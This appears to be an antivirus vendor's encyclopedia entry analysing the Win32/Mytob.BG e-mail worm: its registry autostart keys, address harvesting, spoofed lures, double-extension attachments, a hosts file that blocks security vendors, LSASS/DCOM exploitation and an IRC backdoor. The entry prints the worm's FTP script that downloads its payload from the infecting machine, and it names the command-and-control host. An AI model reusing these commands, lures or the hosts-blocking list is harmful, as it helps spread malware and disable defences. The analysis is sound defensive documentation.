Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.BG

   
Aliases: W32/Mytob-BZ (Sophos), W32/Mytob.BE.worm (Panda), Net-Worm.Win32.Mytob.x (Kaspersky)
Type: Mass mailing e-mail worm
Affect: 32-bit Windows

Summary:

MyTob.BG is a 64 kilobyte mass mailing e-mail worm that is runtime compressed by PECompact, an executable runtime protector.

Installation and Autostart Techniques:

Upon execution, the worm copies itself into the %System% folder as "taskgmr.exe".

Note: %System% denotes Windows System directory (e.g. C:\WINDOWS\SYSTEM32) as they differ on various versions of Microsoft Windows.

It also drops the component, HELLMSN.EXE (6050 bytes in size), in the root directory, which is usually C:\. This dropped component is detected by NOD32 as W32/Mytob.I (MSN Messenger Spreading Component) and is runtime compressed by FSG.

Mytob.BG creates copies of itself in the root directory wit the following names:

"funny_pic.scr"
"my_photo2005.scr "
"see_this!!.scr"

The worm creates a mutex "H-E-L-L-B-O-T" to avoid multiple running instances of the worm on one machine.

The following registry key is added to the registry to make sure that MyTob.BG runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINRUN" = "taskgmr.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINRUN" = "taskgmr.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINRUN" = "taskgmr.exe"

The following registry keys are added as well:

HKLM\Software\Microsoft\OLE
"WINRUN" = "taskgmr.exe"

HKCU\Software\Microsoft\OLE
"WINRUN" = "taskgmr.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINRUN" = "taskgmr.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINRUN" = "taskgmr.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.

E-mail Harvesting:

MyTob.BG scans all fixed disks and attempts to collect e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

Due to a bug in the use of the stringcat and compare function with the WIN32_FIND_DATA results the MyTob.BG will attempt to harvest email addresses from files when at least one character matches one of the characters in the file extension list in the correct order.

In technical terms, that means the worm compares the file extension via 'instring function/substring function'.

For example, the worm will search for e-mail addresses in files where the file extension matches *.h, *.ht, and *.htm.

Mytob.BG collects also e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

DNS Resolving:

The worm performs DNS e-mail-exchange-queries to find an appropriate mail server for each domain it tries to send itself to. If this DNS request for the mail server fails, the worm tries to guess the e-mail server adding in front of the domain name the following prefixes:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

E-mail Sender:

The worm spoofs the sender's e-mail address using a name from the following list:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

The domain name attached to the sender's name is randomly selected from the following list:

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com

The domain names are ROT-13 encrypted and stored in the worm.

Mytob.BG uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail Subjects:

MyTob.BG randomly selects a subject line from the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

The e-mail subjects are ROT-13 encrypted and stored in the worm.

Message Body:

The e-mail contains one of the following messages:

Mail transaction failed. Partial message is available.

The message contains Unicode characters and has been sent as a binary attachment.

The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

The original message was included as an attachment.

Here are your banks documents.

A blank message body or random strings may also be sent.

E-mail Attachments:

The worm attaches a copy of itself using one of the following file names:

body
message
test
data
file
text
readme
document

And one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a large number of spaces to hide the executable file extension:

pif
scr
exe

Example: attachment "text.zip" may contain a file named "text.txt .scr"

The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

The email addresses are not case sensitive. Both "Microsoft.com" and "Microsoft.com" will be avoided.

Hostfile Manipulation:

The current hosts file is overwritten with the following data to prevent access to these sites:

127.0.0.1 www.trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com

Exploiting Vulnerabilities:

MyTob.BG generates random IP addresses and attempts to connect to port 445 of the generated IP's to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs the worm to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using 2pac.txt FTP-Commands file)

The DCOM RPC vulnerability [see MS03-026] is also exploited for replication.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of itself named "bingoo.exe" and starts this file after downloading.

References:

http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

MyTob.BG provides IRC-Backdoor functionality with the following functions:

Download files
Download new worm updates
Execute files
Provide uptime information to the remote controller
Provide information about the worm variant to the remote controller
Notify IRC Channels/Operator via private message
Restart the computer

MyTob.BG tries to connect to no.siberkorsan.com on port 6667 (TCP/IP)

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.

History: Analysis and Write-up by: Michael St. Neitzel